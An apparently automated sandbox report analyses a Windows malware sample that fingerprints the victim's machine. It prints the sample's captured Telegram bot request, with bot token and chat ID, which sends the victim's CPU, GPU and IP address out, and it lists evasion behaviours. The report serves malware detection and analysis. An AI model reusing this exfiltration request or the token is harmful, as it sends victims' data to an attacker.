Windows Analysis Report
xYWm6BV3NZ.exe

Overview

General Information

Sample Name: xYWm6BV3NZ.exe
Analysis ID: 567681
MD5: 166c72239b76c7f2dcd5cb02138adc42
SHA1: 738654027847e49909f1180c147f79c80acb947f
SHA256: 013f6b8faad5ceefe26e0817e770031e6df82da64e1b38dc4299b9bf55ba731a
Detection

Score: 68
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Telegram Recon
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Uses the Telegram API (likely for C&C communication)
May check the online IP address of the machine
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Sample file is different than original file name gathered from version info
May sleep (evasive loops) to hinder dynamic analysis
Binary contains a suspicious time stamp
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges

Classification

  • System is w10x64
  • xYWm6BV3NZ.exe (PID: 4400 cmdline: "C:\Users\user\Desktop\xYWm6BV3NZ.exe" MD5: 166C72239B76C7F2DCD5CB02138ADC42)
    • conhost.exe (PID: 4984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
No configs have been found
Source: xYWm6BV3NZ.exe
Rule: JoeSecurity_TelegramRecon
Description: Yara detected Telegram Recon
Author: Joe Security
Strings: (none listed)

    Source: DNS query | Author: Brandon George (blog post), Thomas Patzke (rule) | Data: Image: C:\Users\user\Desktop\xYWm6BV3NZ.exe, QueryName: ip-api.com

    AV Detection

    Source: xYWm6BV3NZ.exe | ReversingLabs: Detection: 69%
    Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49758 version: TLS 1.2
    Source: xYWm6BV3NZ.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
    Source: Binary string: \Amongus\Amongus\obj\Debug\Amongus.pdb | source: xYWm6BV3NZ.exe

    Networking

    Source: unknown | DNS query: name: api.telegram.org
    Source: C:\Users\user\Desktop\xYWm6BV3NZ.exe | DNS query: name: ip-api.com
    Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
    Source: global traffic | HTTP traffic detected: GET /bot2026552572:AAHsPVE1-XE3QqnTTeDfJ5cBY-LRzVYRfSY/sendMessage?chat_id=1704933594&text=CPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%202F7CW8A1%0AIP:%20102.129.143.61 HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
    Source: global traffic | HTTP traffic detected: GET /line?fields=query HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
    Source: Joe Sandbox View | IP Address: 208.95.112.1
    Source: unknown | Network traffic detected: HTTP traffic on port 49758 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49758
    Source: xYWm6BV3NZ.exe, 00000000.00000002.367818391.00000000031B9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.telegram.org
    Source: xYWm6BV3NZ.exe, 00000000.00000002.367587681.00000000012F8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
    Source: xYWm6BV3NZ.exe, 00000000.00000002.367808252.000000000319E000.00000004.00000800.00020000.00000000.sdmp, xYWm6BV3NZ.exe, 00000000.00000002.367791831.000000000318C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com
    Source: xYWm6BV3NZ.exe | String found in binary or memory: http://ip-api.com/line?fields=query
    Source: xYWm6BV3NZ.exe, 00000000.00000002.367800472.0000000003196000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com4m(
    Source: xYWm6BV3NZ.exe, 00000000.00000002.367791831.000000000318C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: xYWm6BV3NZ.exe, 00000000.00000002.367808252.000000000319E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
    Source: xYWm6BV3NZ.exe | String found in binary or memory: https://api.telegram.org/bot
    Source: xYWm6BV3NZ.exe, 00000000.00000002.367808252.000000000319E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot2026552572:AAHsPVE1-XE3QqnTTeDfJ5cBY-LRzVYRfSY/sendMessage?chat_id=17049
    Source: xYWm6BV3NZ.exe, 00000000.00000002.367808252.000000000319E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org4m
    Source: unknown | DNS traffic detected: queries for: ip-api.com